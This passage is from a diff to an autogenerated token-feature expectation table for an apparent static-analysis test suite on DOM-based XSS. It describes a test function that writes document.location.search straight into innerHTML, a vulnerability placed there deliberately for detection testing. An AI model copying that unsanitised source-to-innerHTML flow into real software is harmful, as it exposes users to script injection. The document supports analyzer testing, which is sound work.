element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | return of function domMethods | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | return of function domMethods | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | return of function domMethods | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | return of function domMethods | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:459:10:459:19 | domMethods | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:459:10:459:19 | domMethods | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:459:10:459:19 | domMethods | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:11 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:11 | source | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:11 | source | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:11 | source | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:11 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source ... .search | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source ... .search | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:460:6:460:38 | source ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:22 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:22 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:22 | document | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:22 | document | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:22 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:31 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:31 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:31 | document.location | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:31 | document.location | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:31 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:38 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:38 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:38 | documen ... .search | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:38 | documen ... .search | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:460:15:460:38 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:460:24:460:31 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:460:24:460:31 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:460:24:460:31 | location | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:460:24:460:31 | location | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:460:24:460:31 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:460:33:460:38 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:460:33:460:38 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:460:33:460:38 | search | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:460:33:460:38 | search | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:460:33:460:38 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:11 | table | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:11 | table | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:11 | table | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:11 | table | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:11 | table | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table = ... table') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table = ... table') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table = ... table') | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table = ... table') | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:462:7:462:48 | table = ... table') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:22 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:22 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:22 | document | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:22 | document | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:22 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:37 | documen ... entById | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:37 | documen ... entById | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:37 | documen ... entById | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:37 | documen ... entById | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:37 | documen ... entById | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | documen ... table') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | documen ... table') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | documen ... table') | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | documen ... table') | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | documen ... table') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | exceptional return of documen ... table') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | exceptional return of documen ... table') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | exceptional return of documen ... table') | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | exceptional return of documen ... table') | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:462:15:462:48 | exceptional return of documen ... table') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:462:24:462:37 | getElementById | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:462:24:462:37 | getElementById | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:462:24:462:37 | getElementById | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:462:24:462:37 | getElementById | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:462:24:462:37 | getElementById | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:462:39:462:47 | 'mytable' | CalleeFlexibleAccessPath | document.getElementById | | autogenerated/Xss/DomBasedXss/tst.js:462:39:462:47 | 'mytable' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:462:39:462:47 | 'mytable' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17752,12 +123270,72 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:462:39:462:47 | 'mytable' | enclosingFunctionName | domMethods | | autogenerated/Xss/DomBasedXss/tst.js:462:39:462:47 | 'mytable' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:462:39:462:47 | 'mytable' | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:7 | table | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:7 | table | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:7 | table | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:7 | table | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:7 | table | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:17 | table.innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:17 | table.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:17 | table.innerHTML | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:17 | table.innerHTML | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:17 | table.innerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:26 | table.i ... source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:26 | table.i ... source | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:26 | table.i ... source | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:26 | table.i ... source | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:463:3:463:26 | table.i ... source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:463:9:463:17 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:463:9:463:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:463:9:463:17 | innerHTML | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:463:9:463:17 | innerHTML | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:463:9:463:17 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:463:21:463:26 | source | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:463:21:463:26 | source | 